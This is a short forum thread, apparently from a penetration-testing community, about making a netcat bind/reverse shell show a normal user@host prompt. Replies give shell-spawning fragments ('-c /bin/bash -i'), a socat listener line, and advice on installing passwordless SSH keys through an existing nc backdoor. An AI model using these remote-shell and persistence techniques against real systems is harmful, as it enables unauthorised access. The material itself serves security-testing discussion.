Results 1 to 5 of 5

Thread: help with netcat

  1. #1
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    2

    Default help with netcat

    Hi,

    I'm trying to use netcat to create a bind+reverse shell.

    Everything is going well, but i would like to get the user@host prefix on the `attacker` netcat session.
    iv'e tried using pipe, and searching for a fitting switch, but without any luck..

    Have any idea?

  2. #2
    Junior Member
    Join Date
    Jul 2009
    Posts
    37

    Default

    try running sh or bash right when you gain root

  3. #3
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by b3r00tb4ck View Post
    try running sh or bash right when you gain root
    That won't do it, not enough of the environment is set up and nc is not strictly "interactive" in the same sense as ssh or rsh is.

    If you have a nc backdoor, far easier to setup ssh to operate in the same way - if you need you can install ssh keys with no password to use purely for tunneling (reverse [ -R ] or otherwise [ -L ]), and then login via the usual method. This will give you a shell, secures your communications, and is an easier way to track the audit log for your report as SSH automatically logs successful logins.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  4. #4
    Junior Member
    Join Date
    Jan 2010
    Posts
    79

    Default

    Look at something like "-c /bin/bash -i" to see if that's what you're looking for.

  5. #5
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    Quote Originally Posted by Gitsnik View Post
    That won't do it, not enough of the environment is set up and nc is not strictly "interactive" in the same sense as ssh or rsh is.

    If you have a nc backdoor, far easier to setup ssh to operate in the same way - if you need you can install ssh keys with no password to use purely for tunneling (reverse [ -R ] or otherwise [ -L ]), and then login via the usual method. This will give you a shell, secures your communications, and is an easier way to track the audit log for your report as SSH automatically logs successful logins.
    Truly the correct idea, however im sure thats way to advanced .. the easy way for what he wants would be to write a script that just echo's a me@me:~# so it appears as if you have a standard shell.

    socat can for sure do this, and ive done it but for the life of me i cant remember the syntax. You can even setup a history file so you can scroll back through your commands .. like so.

    socat readline,history=$HOME/blafile,append tcp-l:4444
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •